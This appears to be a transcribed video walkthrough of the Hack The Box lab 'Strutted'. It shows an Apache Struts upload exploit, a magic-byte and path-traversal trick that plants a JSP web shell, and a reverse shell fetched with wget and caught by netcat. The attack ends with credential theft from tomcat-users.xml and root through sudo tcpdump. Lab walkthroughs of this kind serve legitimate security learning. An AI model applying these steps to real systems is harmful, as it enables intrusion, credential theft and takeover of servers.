Hello and welcome to this medium Linux box. If you know the steps you have to take, it's quite a sort of straightforward box which you can look at. But I noticed there was no video walkthrough for Strutted, and I just managed to come across this. Honestly, because I think I'm looking for more pawns because it's easier to find write-ups and tutorials on how to do these boxes. But I ended up with this one. There's only a couple of write-ups, and I'm just going to show you how to get initial foothold in two different ways, and also how you can escalate your privileges, which is just a GTFO binary exploitation, and then this one is a exploit. First of all, there's not much in the scan itself, so we are left with the website. If we just go to the website, hack the box, we will see some upload functionality. If you can download, for some reason it downloads the complete file structure for you. I'm not sure why it's not downloading. Maybe my proxy's on. No. Oh, okay, it took a while. And this actually, if we go to downloads, for some reason downloads the strutted.zip one. I have already downloaded it, so I'm just going to remove the strutted.zip. Strutted.zip. And I'm just going to do a codium. Actually, I'm going to go back. Codium. Tree on /downloads. If you see what is inside of here, we can see we have cat JPEG, which is just my file, and we have context XML, Docker file, kitty cat. These are my pictures. And then we have Strutted, which is just the source, and it's pretty fun to look at what kind of things can we interact with, which is uploaded Java, so it's probably going to be something we want to look at. And there's of course going to be other instances of the code. If I just go into Codium and do it on downloads, it opens up this VS Code Linux thing, and we can look at the things what we want to look at. First of all, just by going over to the Docker file, we can just browse through basic enumeration, what Tomcat is used, what kind of framework is used. In this case, it's the Maven one, which I'm pretty sure it's some file upload code functionality thing, but I've already forgot. Then there's a README, which is always good to get yourself into what kind of system you're dealing with. It's going to be Tomcat users. I couldn't figure out where this was used. Maybe it's not used anywhere. So this might be some test page, for example. And then inside of Strutted, there's going to be POM.xml, which does contain the version of Maven which is in use. This does give you the opportunity to find certain exploits. One of them being this. Actually, sorry, I don't have it here. Let me see if it's. I don't think this mentions. Okay, we have the CVE here. I think this is the one, which goes into depth of the Apache struts thing that's also being run. Because if we look for struts here, we can see we have 6301, and you can find a vulnerable version for this one. So first of all, I just downloaded this code, and immediately I'm just going to try and run it. So first of all, this is going to be the way it works, right? So we have idea, who am I, and we can set up a reverse connection in this way. This was one of the easier flags if you think about it this way. But honestly, it was not that easy. If I just go to /home/ actually, this is not even a user yet. I'm messing with you. This was one of the ways. I'll show you how it works. So inside of exploit, we have a couple of things. And I might. All right. So actually, let me do this in Vim. So we have, these are the things we have to change. Oh, actually, there's more, but I'll get into it in a second. We have to change this number of parents and path to 5, because this is the one where the file is being uploaded, and I think it's inside of root or var dev root and then something else. I was just trying 1, 2, 3, 4, and 5 to see where things would work, and this was the case where it worked. Now you have to create this war file because we want to upload it to Tomcat, because that's the sort of framework that's being used in the backend. But what you have to change is inside of the file that we want to upload, we want to make sure it's an image, because the only thing it is accepting is an image. If we look at Codium here, and we go into source, Java, and then upload, if we look for is allowed, we can see the private boolean, it's only allowing image like PNG, GIF, and JPEG. So for this reason, we want to use either GIF, PNG, or something of that kind. Well, once we have this changed, there was something else you had to change. yeah, so we're just adding this GIF 89A. If we look at the magic bytes, so magic bytes all files, we can see list of signature files. For example, if we do a PNG, you would end up with these magic bytes. If we were to do a GIF, you would use GIF89A and GIF87A. I'm not sure what is the difference between these, but this is just something that we want to use. And of course, there's also going to be JPEG, and they for some reason use Joya, which is this. I'm not sure why, but that's just something. If you see those things, you can try to do, for example, some injection into just using this and then having code into the thing itself. Right, so we know it's only accepting these types, and those are the things we just have changed. So this one, and then we have its, let's see what else I changed here, and the image GIF thing. Right, we can actually try to run this. So if we just go here and do a Python 3 and upload action, you can see it works. And you can just set up a network like netcat connection using this method. This was the first method. I kind of like it, but I do like to go into the code more. So I'm just going to leave this behind for now. And what I'm going to do, I'm just going to go and browse through how they managed to do it. What they do, if they open a Burp Suite, they will change the code that is inside of, in this case, a JPEG, and they will insert it itself. And for some reason, if you change this one to a lowercase, it doesn't read it, but it does sort of accept it. And then if you change this one as well to a lowercase, for some reason, I still don't know why, because if I just look for upload, I'm still flabbergasted that this works. But for some reason, it does end up using this string instead of the void. I'm not sure how it works, but for some reason, it allows you to, insert your own shell thing. So they basically use this payload here. And what I'm going to do, I'm just going to capture a request of uploading a picture. So I'll just go to home, and I hope this is not accepting. Browse, and I just have some mouse.jpg. It doesn't really matter what you can use as long, just choose a small file because it doesn't really matter. Open it, make sure the proxy is on. Then we just choose upload. And inside of here, I'm just going to send one to repeater because then we can try an error. If we run this, you want to see what kind of message do you get when you made a successful upload. First one is being upload successful. And if we browse down, we can see we have the link here. We can visit this link onto the main page. So if we just go here, we were to go to here, we would see our image. It would be awesome because it's like if there was some shell file we could upload here or some JSP file. Well, we actually can. So you want to keep this Joja part because those are the magic byte. You can remove the rest, doesn't matter. But make sure if you have this is like the boundary which is set. It is I'm not sure how the boundary works, but it's being set here, and it just is used for example, image, GIF, and PNG files to sort of put in data. So it's like right here, these are the names. We have the starting byte, and then this is the boundary for the other end. What we're going to insert here is we want to insert the payload we got, which is this one. You just want to insert it right below this one. And we want to set up this boundary again. So I'll just copy this boundary because it needs to match. And I'll put it right behind the thing itself. And make sure to not change this one to a lowercase or uppercase. It was uppercase, I think. So you match it, which is inside the Java. We don't need to change anything on top anymore. We can just go down because it does look for .jpg. So just keep this the same. And this as well, but this is accepting the code. Once you go here, we can actually put some more data between this. So there's actually the same part we had above. So it's a content disposition. I want to use this, but make sure to change some stuff here. So it's going to be, instead of mouse.jpg, I want to change it to, for example, shell.jsp. Actually, no, this was not the one. What do I need? I think I needed to call the function. I think that's what I needed to do. Sorry, I've not prepared it as good. So the name is going to be form data. I think at this top dot upload file name like this. And then you can choose its file name. So we just go back and we know where we have to insert it since we saw that this was in mouse JPEG. So we go back one, we go back one more. So we should be inside of this directory where we can immediately see our file. So if I were to run this, I hope I do get a upload successful, and maybe I get the shareable link. So we see upload shell.jsp, meaning we can just go to shell.jsp. So if I were just go here, and then we have shell.jsp, and you do have to provide it with the action. The way it works, I think in Java's action is command, and then you can do more. This is not proxy, is the one. This should, so this is just showcasing the data type itself, and you can provide any command in here. So and command is ID. You can see what kind of thing you get. It's basically how this works. You have the cmd equal to, and then you can insert code here, I believe. I haven't really looked into this, but I'm just going to go through this. Right, now I can actually sort of like cat files, for example, cat %20/et/password, and I can see certain things that are on the system. You can get a reverse shell this way, for example, by running a bash. So what you're left with is this ID command, which if you have code execution, we can just create this reverse shell. So if you just go to ref shell and set your IP import correctly and just select bash, you want to make sure you copy this thing. And I just want to create some sort of file. So before I do that, I'll just do a vim on bash.shell, and I'll just upload this and make sure to change it. So it says, let's see, I have to do the standard /bin/bash, and then we can do, I think it's just bash command this. I believe this is the thing we want to run. Well, let's try it anyway. I'm just going to do Python 3 mhtb.server on 8080 if it's available. It's not, so let's just 8081. And now I want to go to the website and actually download this file. The way we can do this, I can just do a wget on 10.10.14.7, and then the IP address is 8081, and then /bash.shell, and then the output is gonna be to, actually let's not do that one. And let's just now run ls scan. I'm not sure if I can write to this directory. I'm not seeing it. Let's try it again. So with the output to /tmp/bash.shell, and let's just do ls on /tmp. I do see bash.shell, so it means like we uploaded it. Now we just want to run it, right? So to be able to run it, we have to change the permissions. So chmod +777, actually, sorry, 777 on /tmp/bash.shell. I believe that's correct. And let's just do an ls/la on /tmp. And we have read, write, execute, rewrite, execute, which is good as the Tomcat user. Now just make sure to start as listener. So netcat nlvp. Did we use 9001? Yeah, 9001. And we just have to run this script. So if I were to now do /tmp/bash.shell, it hangs, which is a good sign. And then we have this other thing, which is also good. So we can actually like use things here. One of the main things you'll see is conf, and then we also have logs, which could be interesting, but most of the time you want to look into something as conf. I can see Catalina contact, but I'm really interested in Tomcat users. So let's just do a Tomcat users.xml. And immediately I see the password. We know that the users are James and root, which are the only ones we can access. So it's always a good guess to SSH into James at Strutted, provide its password, and be granted the flag. Immediately, if you get onto the system, it's always good to run sudo l, so you can see what kind of things you can perform as the user itself. If you just now go through, let me just clear this up a bit, like this. If we now go to GTFO bins, it's always good to see what kind of things you can do with the things you can run. So one is the TCP dump. Right, it looks pretty easy. So we have a command and sudo, which is exactly the same thing. we're creating a command or like a variable. We're making a temp directory. We're putting this thing inside of TF. So we're basically putting ID into here. Then we're ch1ing plus x to TF, and then we're executing. So we're only creating and executing, which is, should be pretty straightforward. Right, to try this, I would just want to do a command is, and let's just do something like ID. Then we can do something, you can name it anything you want, to a dollar sign, and do mk temp. Then we can just do an echo of this command into something. And you should have, it's a variable, but you can do something. It's created sort of a variable thing, which you can call. And now we just want to do chmod plus x on something. And now we want to run this command here thing. Make sure to run it as sudo. So sudo, and then we have to change this to something. We can see we get permission denied, which is not a good sign. Why did we get that one? Oh, sorry. We have to run z is the one you want to run, and then we have to specify what user we want to root. So it's going to be root. I think this is the correct one, as it said permission denied. Drop a kernel. Why is it not bringing me any success? All right, I'm going to try another one. So I'm just going to create a file called kick, and I'm just going to do ref shell because, I'm not sure what's going wrong. Let's just copy this thing again. Or I think I still have it copied. Yes, there we have it. So we're just going to do TCP IP on, we're calling this TCP packet thing, and we're just writing the standard output error to this one. Well, now that we've got this, we want to make an executable. And as you can see, this is like one of the other methods I tried. These are basically also created by me. And now what we want to run is we have to run the above command again. And now we want to specify the file we want. And I think this is just going to be kick. And I don't have my listener. And I got L and VP 9001, which should be running. And we just want to run the command. The way we want to run it, I think I'm guessing what else I had to do here. Let me just look through my notes real quick. It's gonna be, yeah, okay. We just have to select the file which we want to run. So it's gonna be kick and then the user root. It's not working, maybe just taking a while. It rings red, which means we did get access to the system. And this was basically like the flag itself. I'm not sure why this first method didn't work, because it did say permission denied. So I'm just going to try it again real quick. I have it copied here, so I'm just going to try that. This is the one I want. And then we have the sudo TCP, where we want to run this TF thing as a root. And let's see what we get here. We still get the 0. I'm not sure why this isn't working, because I believe it has to. Well, CTF, maybe not the user. It should. It should not matter, I think, because this is permission. Oh, okay. I'm not sure why this one doesn't work, but this was at least the box itself, and we'll have a nice evening.